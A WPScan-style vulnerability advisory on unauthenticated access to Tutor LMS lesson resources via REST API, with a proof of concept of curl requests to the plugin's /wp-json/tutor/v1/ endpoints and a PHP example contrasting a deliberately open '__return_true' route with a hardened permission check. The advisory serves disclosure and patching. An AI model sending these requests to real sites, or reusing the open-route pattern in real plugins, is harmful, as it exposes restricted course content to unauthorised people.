wpvulndb | A. S. M. Muhiminul Hasan | WPVDB-ID: 3B6969A7-5CBC-4E16-8F27-5DDE481237F5
History: Jun 12, 2023 - 12:00 a.m.

Tutor LMS < 2.2.1 - Unauthenticated Access to Tutor LMS Lesson Resources via REST API

Published: 2023-06-12 00:00:00
Reporter: A. S. M. Muhiminul Hasan
Source: wpscan.com
8
Tags: tutor lms, unauthenticated access, rest api, information disclosure

EPSS: 0.001 (Low), Percentile: 42.3%

The plugin does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.

PoC

1. Create a new Course, add a Topic, and add a Lesson to the Topic.
2. In Tutor LMS > Settings > Course, ensure that "Course Visibility" is toggled to "On" (Students must be logged in to view course).
3. Run the following curl command to get the ID of the course: curl http://SITE_URL/wp-json/tutor/v1/courses
4. Using the Course ID, run the following curl command to get the ID of the Topic: curl http://SITE_URL/wp-json/tutor/v1/course-topic/
5. Using the Topic ID, run the following curl command to get all of the data from the Lesson, without being logged in: curl http://SITE_URL/wp-json/tutor/v1/lesson/
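The description and PoC above come down to REST endpoints registered without an adequate permission_callback. The following is an added illustration, not Tutor LMS code: a WordPress REST route for lesson content registered with the weak `__return_true` pattern beside the same route behind a check that enforces login and course access. The route names, meta keys and the enrolment helper are hypothetical.

```php
<?php
// Added example (not Tutor LMS code). Route names, meta keys and the
// enrolment helper below are hypothetical; the WordPress APIs are real.

add_action( 'rest_api_init', function () {
    // Weak: __return_true makes the endpoint readable by anyone, logged in or not.
    register_rest_route( 'example-lms/v1', '/lesson/(?P<id>\d+)', array(
        'methods'             => 'GET',
        'callback'            => 'example_lms_get_lesson',
        'permission_callback' => '__return_true',
    ) );

    // Hardened: same handler, but the request must pass a real permission check.
    register_rest_route( 'example-lms/v1', '/secure-lesson/(?P<id>\d+)', array(
        'methods'             => 'GET',
        'callback'            => 'example_lms_get_lesson',
        'permission_callback' => 'example_lms_can_view_lesson',
        'args'                => array( 'id' => array( 'validate_callback' => 'is_numeric' ) ),
    ) );
} );

function example_lms_can_view_lesson( WP_REST_Request $request ) {
    $lesson = get_post( (int) $request['id'] );
    if ( ! $lesson || 'lesson' !== $lesson->post_type ) {
        return new WP_Error( 'rest_not_found', 'Lesson not found.', array( 'status' => 404 ) );
    }
    // Mirrors a "students must be logged in" setting: anonymous callers get 401.
    if ( ! is_user_logged_in() ) {
        return new WP_Error( 'rest_forbidden', 'Login required.',
            array( 'status' => rest_authorization_required_code() ) );
    }
    // Authors/editors of the lesson, or enrolled students, may read it.
    if ( current_user_can( 'edit_post', $lesson->ID )
        || example_lms_is_enrolled( get_current_user_id(), $lesson->ID ) ) {
        return true;
    }
    return new WP_Error( 'rest_forbidden', 'Not enrolled in this course.', array( 'status' => 403 ) );
}

function example_lms_is_enrolled( $user_id, $lesson_id ) {
    // Hypothetical storage: lesson -> course ID in post meta, enrolments in user meta.
    $course_id = (int) get_post_meta( $lesson_id, '_example_course_id', true );
    $enrolled  = array_map( 'intval', (array) get_user_meta( $user_id, '_example_enrolled_courses', true ) );
    return $course_id > 0 && in_array( $course_id, $enrolled, true );
}

function example_lms_get_lesson( WP_REST_Request $request ) {
    $lesson = get_post( (int) $request['id'] );
    return rest_ensure_response( array(
        'id' => $lesson->ID, 'title' => $lesson->post_title, 'content' => $lesson->post_content,
    ) );
}
```

A quick self-check when auditing a plugin is to grep its register_rest_route calls for `__return_true` permission callbacks on routes that return content the settings say should require login.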

CPE Name  Operator  Version
tutor     lt        2.2.1

